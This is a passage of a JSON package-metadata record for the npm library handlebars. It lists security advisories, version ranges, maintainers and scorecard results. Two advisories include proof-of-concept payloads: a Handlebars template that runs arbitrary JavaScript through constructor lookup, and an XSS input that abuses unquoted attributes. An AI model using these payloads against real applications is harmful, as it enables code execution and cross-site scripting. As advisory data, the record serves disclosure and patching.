3.0.8"}],"purl":"pkg:npm/handlebars","statistics":{"dependent_packages_count":15556,"dependent_repos_count":1258975,"downloads":160140957,"downloads_period":"last-month"},"affected_versions":["1.0.2-beta","1.0.4-beta","1.0.5-beta","1.0.6","1.0.6-2","1.0.7","1.0.8","1.0.9","1.0.10","1.0.11","1.0.12","1.1.0","1.1.1","1.1.2","1.2.0","1.2.1","1.3.0","2.0.0","2.0.0-alpha.1","2.0.0-alpha.2","2.0.0-alpha.3","2.0.0-alpha.4","2.0.0-beta.1","3.0.0","3.0.1","3.0.2","3.0.3","3.0.4","3.0.5","3.0.6","3.0.7","4.0.0","4.0.1","4.0.2","4.0.3","4.0.4","4.0.5","4.0.6","4.0.7","4.0.8","4.0.9","4.0.10","4.0.11","4.0.12","4.0.13","4.0.14","4.1.0","4.1.1","4.1.2","4.1.2-0","4.2.0","4.2.1","4.2.2","4.3.0","4.3.1","4.3.2","4.3.3","4.3.4","4.3.5","4.4.0","4.4.1","4.4.2","4.4.3","4.4.4","4.4.5","4.5.0","4.5.1","4.5.2"],"unaffected_versions":["3.0.8","4.5.3","4.6.0","4.7.0","4.7.1","4.7.2","4.7.3","4.7.4","4.7.5","4.7.6","4.7.7","4.7.8","4.7.9"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXEyYzYtYzZwbS1nM2do/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWc5cjQteHBtai1tajY1","url":"https://github.com/advisories/GHSA-g9r4-xpmj-mj65","title":"Prototype Pollution in handlebars","description":"Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to prototype pollution. It is possible to add or modify properties to the Object prototype through a malicious template. This may allow attackers to crash the application or execute Arbitrary Code in specific conditions.\n\n\n## Recommendation\n\nUpgrade to version 3.0.8, 4.5.3 or later.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2020-09-04T15:06:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://www.npmjs.com/advisories/1325","https://github.com/advisories/GHSA-g9r4-xpmj-mj65"],"source_kind":"github","identifiers":["GHSA-g9r4-xpmj-mj65"],"repository_url":null,"blast_radius":0.0,"created_at":"2022-12-21T16:13:15.490Z","updated_at":"2026-07-22T12:14:50.601Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWc5cjQteHBtai1tajY1","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWc5cjQteHBtai1tajY1","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.5.3","vulnerable_version_range":"\u003e= 4.0.0, \u003c 4.5.3"},{"first_patched_version":"3.0.8","vulnerable_version_range":"\u003c 3.0.8"}],"purl":"pkg:npm/handlebars","statistics":{"dependent_packages_count":15556,"dependent_repos_count":1258975,"downloads":160140957,"downloads_period":"last-month"},"affected_versions":["1.0.2-beta","1.0.4-beta","1.0.5-beta","1.0.6","1.0.6-2","1.0.7","1.0.8","1.0.9","1.0.10","1.0.11","1.0.12","1.1.0","1.1.1","1.1.2","1.2.0","1.2.1","1.3.0","2.0.0","2.0.0-alpha.1","2.0.0-alpha.2","2.0.0-alpha.3","2.0.0-alpha.4","2.0.0-beta.1","3.0.0","3.0.1","3.0.2","3.0.3","3.0.4","3.0.5","3.0.6","3.0.7","4.0.0","4.0.1","4.0.2","4.0.3","4.0.4","4.0.5","4.0.6","4.0.7","4.0.8","4.0.9","4.0.10","4.0.11","4.0.12","4.0.13","4.0.14","4.1.0","4.1.1","4.1.2","4.1.2-0","4.2.0","4.2.1","4.2.2","4.3.0","4.3.1","4.3.2","4.3.3","4.3.4","4.3.5","4.4.0","4.4.1","4.4.2","4.4.3","4.4.4","4.4.5","4.5.0","4.5.1","4.5.2"],"unaffected_versions":["3.0.8","4.5.3","4.6.0","4.7.0","4.7.1","4.7.2","4.7.3","4.7.4","4.7.5","4.7.6","4.7.7","4.7.8","4.7.9"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWc5cjQteHBtai1tajY1/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTJjZjUtNHc3Ni1yOXF2","url":"https://github.com/advisories/GHSA-2cf5-4w76-r9qv","title":"Arbitrary Code Execution in handlebars","description":"Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting).\n\nThe following template can be used to demonstrate the vulnerability:  \n```{{#with \"constructor\"}}\n\t{{#with split as |a|}}\n\t\t{{pop (push \"alert('Vulnerable Handlebars JS');\")}}\n\t\t{{#with (concat (lookup join (slice 0 1)))}}\n\t\t\t{{#each (slice 2 3)}}\n\t\t\t\t{{#with (apply 0 a)}}\n\t\t\t\t\t{{.}}\n\t\t\t\t{{/with}}\n\t\t\t{{/each}}\n\t\t{{/with}}\n\t{{/with}}\n{{/with}}```\n\n\n## Recommendation\n\nUpgrade to version 3.0.8, 4.5.2 or later.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2020-09-04T14:57:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:L","references":["https://www.npmjs.com/advisories/1316","https://github.com/advisories/GHSA-2cf5-4w76-r9qv"],"source_kind":"github","identifiers":["GHSA-2cf5-4w76-r9qv"],"repository_url":null,"blast_radius":0.0,"created_at":"2022-12-21T16:13:15.557Z","updated_at":"2026-04-05T20:06:20.206Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTJjZjUtNHc3Ni1yOXF2","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTJjZjUtNHc3Ni1yOXF2","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.5.2","vulnerable_version_range":"\u003e= 4.0.0, \u003c 4.5.2"},{"first_patched_version":"3.0.8","vulnerable_version_range":"\u003c 3.0.8"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTJjZjUtNHc3Ni1yOXF2/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWY1MmctNmpoeC01ODZw","url":"https://github.com/advisories/GHSA-f52g-6jhx-586p","title":"Denial of Service in handlebars","description":"Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service.\n\n\n## Recommendation\n\nUpgrade to version 4.4.5 or later.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2020-09-03T23:20:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://www.npmjs.com/advisories/1300","https://github.com/advisories/GHSA-f52g-6jhx-586p"],"source_kind":"github","identifiers":["GHSA-f52g-6jhx-586p"],"repository_url":null,"blast_radius":0.0,"created_at":"2022-12-21T16:13:15.647Z","updated_at":"2026-06-04T03:11:10.066Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWY1MmctNmpoeC01ODZw","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWY1MmctNmpoeC01ODZw","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.4.5","vulnerable_version_range":"\u003e= 4.0.0, \u003c 4.4.5"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWY1MmctNmpoeC01ODZw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02cjV4LWhtZ2ctN2g1M84AAuAf","url":"https://github.com/advisories/GHSA-6r5x-hmgg-7h53","title":"Remote code execution in Handlebars.js","description":"Handlebars.js before 4.1.0 has Remote Code Execution (RCE)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2019-07-15T19:46:01.000Z","withdrawn_at":"2019-07-15T19:46:01.000Z","classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/wycats/handlebars.js/issues/1267#issue-187151586","https://github.com/wycats/handlebars.js/commit/edc6220d51139b32c28e51641fadad59a543ae57","https://github.com/advisories/GHSA-6r5x-hmgg-7h53"],"source_kind":"github","identifiers":["GHSA-6r5x-hmgg-7h53"],"repository_url":"https://github.com/wycats/handlebars.js","blast_radius":0.0,"created_at":"2022-12-21T16:12:01.378Z","updated_at":"2026-04-28T20:09:11.243Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cjV4LWhtZ2ctN2g1M84AAuAf","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02cjV4LWhtZ2ctN2g1M84AAuAf","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.1.0","vulnerable_version_range":"\u003c 4.1.0"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cjV4LWhtZ2ctN2g1M84AAuAf/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXE0MnAtcGc4bS1jcWg2","url":"https://github.com/advisories/GHSA-q42p-pg8m-cqh6","title":"Prototype Pollution in handlebars","description":"Versions of `handlebars` prior to 4.0.14 are vulnerable to Prototype Pollution. Templates may alter an Objects' prototype, thus allowing an attacker to execute arbitrary code on the server.\n\n\n## Recommendation\n\nFor handlebars 4.1.x upgrade to 4.1.2 or later.\nFor handlebars 4.0.x upgrade to 4.0.14 or later.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2019-06-05T14:07:48.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","references":["https://github.com/handlebars-lang/handlebars.js/issues/1495","https://github.com/handlebars-lang/handlebars.js/commit/7372d4e9dffc9d70c09671aa28b9392a1577fd86","https://snyk.io/vuln/SNYK-JS-HANDLEBARS-173692","https://www.npmjs.com/advisories/755","https://github.com/handlebars-lang/handlebars.js/commit/0d6d8c335ad81bad1b672fc56b6a44f6aa472dac","https://github.com/handlebars-lang/handlebars.js/commit/85c8783b34fc6d36145d8b53885ad0b9e3c3f9c4","https://github.com/handlebars-lang/handlebars.js/commit/cd38583216dce3252831916323202749431c773e","https://github.com/advisories/GHSA-q42p-pg8m-cqh6"],"source_kind":"github","identifiers":["GHSA-q42p-pg8m-cqh6"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","blast_radius":0.0,"created_at":"2022-12-21T16:13:28.881Z","updated_at":"2026-07-19T12:07:52.401Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXE0MnAtcGc4bS1jcWg2","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXE0MnAtcGc4bS1jcWg2","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"3.0.7","vulnerable_version_range":"\u003c 3.0.7"},{"first_patched_version":"4.0.14","vulnerable_version_range":"\u003e= 4.0.0, \u003c 4.0.14"},{"first_patched_version":"4.1.2","vulnerable_version_range":"\u003e= 4.1.0, \u003c 4.1.2"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXE0MnAtcGc4bS1jcWg2/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlwcmgtMjU3dy05Mjc3","url":"https://github.com/advisories/GHSA-9prh-257w-9277","title":"Cross-Site Scripting in handlebars","description":"Versions of `handlebars` prior to 4.0.0 are affected by a cross-site scripting vulnerability when attributes in handlebar templates are not quoted.\n\n\n## Proof of Concept\nTemplate:\n```\u003ca href={{foo}}/\u003e```\n\nInput:\n```{ 'foo' : 'test.com onload=alert(1)'}```\n\nRendered result:\n```\u003ca href=test.com onload=alert(1)/\u003e```\n\n\n## Recommendation\n\nUpdate to version 4.0.0 or later.\nAlternatively, ensure that all attributes in handlebars templates are encapsulated with quotes.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2018-10-23T17:20:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2015-8861","https://github.com/wycats/handlebars.js/pull/1083","https://blog.srcclr.com/handlebars_vulnerability_research_findings/","https://github.com/advisories/GHSA-9prh-257w-9277","https://www.npmjs.com/advisories/61","https://www.sourceclear.com/blog/handlebars_vulnerability_research_findings/","https://www.tenable.com/security/tns-2016-18","http://www.openwall.com/lists/oss-security/2016/04/20/11","http://www.securityfocus.com/bid/96434"],"source_kind":"github","identifiers":["GHSA-9prh-257w-9277","CVE-2015-8861"],"repository_url":"https://github.com/wycats/handlebars.js","blast_radius":0.0,"created_at":"2022-12-21T16:13:32.514Z","updated_at":"2026-06-20T04:11:39.880Z","epss_percentage":0.03001,"epss_percentile":0.8563,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlwcmgtMjU3dy05Mjc3","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlwcmgtMjU3dy05Mjc3","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.0.0","vulnerable_version_range":"\u003c 4.0.0"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlwcmgtMjU3dy05Mjc3/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWZtcjQtN2c5cS03aGM3","url":"https://github.com/advisories/GHSA-fmr4-7g9q-7hc7","title":"Moderate severity vulnerability that affects handlebars","description":"**Withdrawn:** Duplicate of GHSA-9prh-257w-9277","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2017-10-24T18:33:36.000Z","withdrawn_at":"2020-06-17T16:30:43.000Z","classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://nvd.nist.gov/vuln/detail/CVE-2015-8861","https://github.com/advisories/GHSA-fmr4-7g9q-7hc7"],"source_kind":"github","identifiers":["GHSA-fmr4-7g9q-7hc7"],"repository_url":null,"blast_radius":0.0,"created_at":"2022-12-21T16:13:39.273Z","updated_at":"2026-07-22T12:15:21.672Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWZtcjQtN2c5cS03aGM3","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWZtcjQtN2c5cS03aGM3","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.0.0","vulnerable_version_range":"\u003c 4.0.0"}],"purl":"pkg:npm/handlebars","statistics":{"dependent_packages_count":15556,"dependent_repos_count":1258975,"downloads":160140957,"downloads_period":"last-month"},"affected_versions":["1.0.2-beta","1.0.4-beta","1.0.5-beta","1.0.6","1.0.6-2","1.0.7","1.0.8","1.0.9","1.0.10","1.0.11","1.0.12","1.1.0","1.1.1","1.1.2","1.2.0","1.2.1","1.3.0","2.0.0","2.0.0-alpha.1","2.0.0-alpha.2","2.0.0-alpha.3","2.0.0-alpha.4","2.0.0-beta.1","3.0.0","3.0.1","3.0.2","3.0.3","3.0.4","3.0.5","3.0.6","3.0.7","3.0.8"],"unaffected_versions":["4.0.0","4.0.1","4.0.2","4.0.3","4.0.4","4.0.5","4.0.6","4.0.7","4.0.8","4.0.9","4.0.10","4.0.11","4.0.12","4.0.13","4.0.14","4.1.0","4.1.1","4.1.2","4.2.0","4.2.1","4.2.2","4.3.0","4.3.1","4.3.2","4.3.3","4.3.4","4.3.5","4.4.0","4.4.1","4.4.2","4.4.3","4.4.4","4.4.5","4.5.0","4.5.1","4.5.2","4.5.3","4.6.0","4.7.0","4.7.1","4.7.2","4.7.3","4.7.4","4.7.5","4.7.6","4.7.7","4.7.8","4.7.9"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWZtcjQtN2c5cS03aGM3/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/handlebars","docker_dependents_count":14519,"docker_downloads_count":4193931721,"usage_url":"https://repos.ecosyste.ms/usage/npm/handlebars","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/handlebars/dependencies","status":null,"funding_links":[],"critical":true,"issue_metadata":{"last_synced_at":"2024-10-28T19:05:59.510Z","issues_count":148,"pull_requests_count":96,"avg_time_to_close_issue":23271243.37142857,"avg_time_to_close_pull_request":15945824.09375,"issues_closed_count":105,"pull_requests_closed_count":64,"pull_request_authors_count":33,"issue_authors_count":117,"avg_comments_per_issue":3.493243243243243,"avg_comments_per_pull_request":1.78125,"merged_pull_requests_count":42,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":18,"past_year_pull_requests_count":9,"past_year_avg_time_to_close_issue":95338.875,"past_year_avg_time_to_close_pull_request":4026891.5,"past_year_issues_closed_count":8,"past_year_pull_requests_closed_count":4,"past_year_pull_request_authors_count":7,"past_year_issue_authors_count":16,"past_year_avg_comments_per_issue":1.6666666666666667,"past_year_avg_comments_per_pull_request":2.6666666666666665,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[{"login":"jaylinski","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars/codemeta","maintainers":[{"uuid":"erisds","login":"erisds","name":null,"email":"github.erisds@gmail.com","url":null,"packages_count":261,"html_url":"https://www.npmjs.com/~erisds","role":null,"created_at":"2022-11-10T11:03:58.168Z","updated_at":"2022-11-10T11:03:58.168Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/erisds/packages"},{"uuid":"wycats","login":"wycats","name":null,"email":"wycats@gmail.com","url":null,"packages_count":109,"html_url":"https://www.npmjs.com/~wycats","role":null,"created_at":"2022-11-10T11:03:58.160Z","updated_at":"2022-11-10T11:03:58.160Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/wycats/packages"},{"uuid":"kpdecker","login":"kpdecker","name":null,"email":"kpdecker@gmail.com","url":null,"packages_count":58,"html_url":"https://www.npmjs.com/~kpdecker","role":null,"created_at":"2022-11-10T11:03:58.157Z","updated_at":"2022-11-10T11:03:58.157Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/kpdecker/packages"},{"uuid":"lawnsea","login":"lawnsea","name":null,"email":"lawnsea@gmail.com","url":null,"packages_count":16,"html_url":"https://www.npmjs.com/~lawnsea","role":null,"created_at":"2022-11-10T11:03:58.164Z","updated_at":"2022-11-10T11:03:58.164Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/lawnsea/packages"},{"uuid":"knappi","login":"knappi","name":null,"email":"npm@knappi.org","url":null,"packages_count":61,"html_url":"https://www.npmjs.com/~knappi","role":null,"created_at":"2022-11-10T11:03:58.171Z","updated_at":"2022-11-10T11:03:58.171Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/knappi/packages"},{"uuid":"jaylinski","login":"jaylinski","name":null,"email":"jakob.linskeseder@gmail.com","url":null,"packages_count":7,"html_url":"https://www.npmjs.com/~jaylinski","role":null,"created_at":"2023-08-01T21:20:39.977Z","updated_at":"2023-08-01T21:20:39.977Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/jaylinski/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5678686,"maintainers_count":1211412,"namespaces_count":399623,"keywords_count":847874,"github":"npm","metadata":{"funded_packages_count":171745},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-06-10T05:11:46.456Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":12242843,"name":"handlebars-source","ecosystem":"rubygems","description":"Handlebars.js source code wrapper for (pre)compilation gems.","homepage":"https://github.com/handlebars-lang/handlebars.js/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":[],"namespace":null,"versions_count":71,"first_release_published_at":"2013-02-20T05:47:21.697Z","latest_release_published_at":"2026-03-26T21:23:13.163Z","latest_release_number":"4.7.9","last_synced_at":"2026-07-22T12:12:15.480Z","created_at":"2025-10-07T03:23:17.203Z","updated_at":"2026-07-22T12:58:04.532Z","registry_url":"https://gem.coop/gems/handlebars-source","install_command":"gem install handlebars-source -s https://gem.coop","documentation_url":"http://www.rubydoc.info/gems/handlebars-source/","metadata":{"funding":null},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2026-06-24T23:40:45.000Z","size":4613,"stargazers_count":18652,"open_issues_count":110,"forks_count":2065,"subscribers_count":432,"default_branch":"master","last_synced_at":"2026-07-18T08:04:33.114Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2026-07-17T19:48:10.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"57b49b24-4bc7-4df8-b069-e31179883809","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/handlebars-lang/handlebars.js","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/sbom","scorecard":{"id":454219,"data":{"date":"2025-08-11","repo":{"name":"github.com/handlebars-lang/handlebars.js","commit":"cc8574e63121861c1c89ef495f9be89ef7dd2413"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4,"checks":[{"name":"Code-Review","score":3,"reason":"Found 9/24 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/release.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":2,"reason":"dependency not pinned by hash detected -- score normalized to 2","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:71: update your workflow using 